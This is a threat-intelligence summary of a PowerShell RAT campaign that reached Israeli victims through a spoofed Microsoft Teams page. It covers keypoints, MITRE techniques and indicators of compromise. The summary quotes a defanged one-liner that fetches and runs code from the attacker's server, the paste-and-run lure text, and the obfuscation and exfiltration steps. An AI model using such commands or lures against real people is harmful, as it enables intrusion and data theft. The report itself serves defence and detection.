The campaign used compromised internal email and a spoofed Teams page to trick Israeli victims into running a multi-stage, fully PowerShell-based loader that delivered a PowerShell RAT. The malware communicated with hxxps[:]//pharmacynod[.]com for C2, victim registration, command polling, and exfiltration. #pharmacynod #MuddyWater
Keypoints
- Phishing emails leveraged a spoofed Microsoft Teams page and social engineering (Win+R, paste, Enter) to execute a Base64-encoded PowerShell command.
- The initial PowerShell one-liner retrieved a secondary script from hxxps[:]//pharmacynod[.]com/Fix which then downloaded test.html and a second PS script to reconstruct the final payload.
- Final payload decoding used binary chunks separated by “kendrick”, Base64, double GZip compression, string reversal, and IEX to execute the RAT entirely in PowerShell.
- Hard-coded C2 domain pharmacynod[.]com was used for registration (/16625), command polling, and exfiltration (/17361) over HTTPS with native .NET requests and legitimate User-Agent behavior.
- C2 commands include numeric-prefixed actions (e.g., 7979 reinit, 5322 download file, 4622 update sleep, 2474 execute commands and exfiltrate results), enabling remote code execution, persistence, and data exfiltration.
- Evidence of lateral movement and regional targeting of Israeli business/infrastructure sectors; campaign shows similarities to MuddyWater but attribution is inconclusive due to tooling and tactic differences.
- Fortinet detections and protections exist (e.g., PowerShell/Agent.PH!tr, blocking via FortiEDR, FortiMail, FortiGate IPS, and DNS/Web filtering of pharmacynod[.]com).
MITRE Techniques
- [T1566 ] Phishing – Initial access via targeted phishing messages using a spoofed Microsoft Teams page that prompts users to paste and run a PowerShell string (“Press & hold Windows key + R…In the verification window, press Ctrl + V…Press Enter on your keyboard to finish”).
- [T1204 ] User Execution – Social engineering to have users execute a malicious PowerShell command via the Run dialog (“paste the decoded PowerShell command into the Windows Run dialog and presses Enter”).
- [T1059.001 ] PowerShell – Entire attack chain and RAT executed through PowerShell IEX with downloaded scripts and decoded payloads (“powershell IEX ((Invoke-RestMethod -Uri hxxps[:]//pharmacynod[.]com/Fix -Method GET)[.]note[.]body)”).
- [T1105 ] Ingress Tool Transfer – Downloader retrieves test.html and additional scripts from attacker-controlled infrastructure (Invoke-WebRequest to hxxps[:]//pharmacynod[.]com//31133 and //35893).”
- [T1027 ] Obfuscated Files or Information – Payloads and commands are Base64-encoded, double GZip-compressed, reversed, and use custom encodings (binary chunks separated by “kendrick”) to conceal malicious content (“IEX (Decompress-Base64-String … )”).
- [T1071.001 ] Web Protocols – C2 communication over HTTPS to pharmacynod[.]com for registration, command polling, and exfiltration (“$global:SRV = “hxxps[:]//pharmacynod[.]com/””).
- [T1016 ] System Network Configuration Discovery – The init function collects Windows domain, computer name, and username to identify victims for the C2 server (collects information: Windows domain, Computer name, Username).
- [T1005 ] Data from Local System – The RAT can read local files and assemble payloads from downloaded test.html (reads line 11 from test.html and extracts content between markers to reconstruct payload).
- [T1041 ] Exfiltration Over C2 Channel – Command results and outputs are compressed, reversed, and POSTed back to pharmacynod[.]com/17361 for exfiltration (“exfiltrated back to the endpoint /17361”).
- [T1573 ] Encrypted Channel – Use of HTTPS and native .NET requests with legitimate User-Agent and proxy settings to blend C2 traffic with normal network traffic (“uses native .NET HTTP requests, sets a legitimate User-Agent via urlmon.dll, leverages default Windows credentials”).
Indicators of Compromise
- [Domain ] C2 and endpoints – hxxps[:]//pharmacynod[.]com/, hxxps[:]//pharmacynod[.]com/16625 (victim registration), hxxps[:]//pharmacynod[.]com/17361 (exfiltration).
- [File name ] Downloaded artifacts – test.html (saved to C:UsersPublicDownloadstest.html) and secondary .ps1 scripts reconstructed from test.html.
- [Hash ] Malware sample – SHA256: 46a76b3c7851f30d68ebc6a5584bc099435b0544d8707fff7a9178f46046708b (PowerShell RAT).
- [Obfuscation patterns ] Encodings observed – double GZip compression, Base64 encoding, string reversal, and ‘+’ replaced with ‘_’ for URL-safety (used across payloads and C2 communications).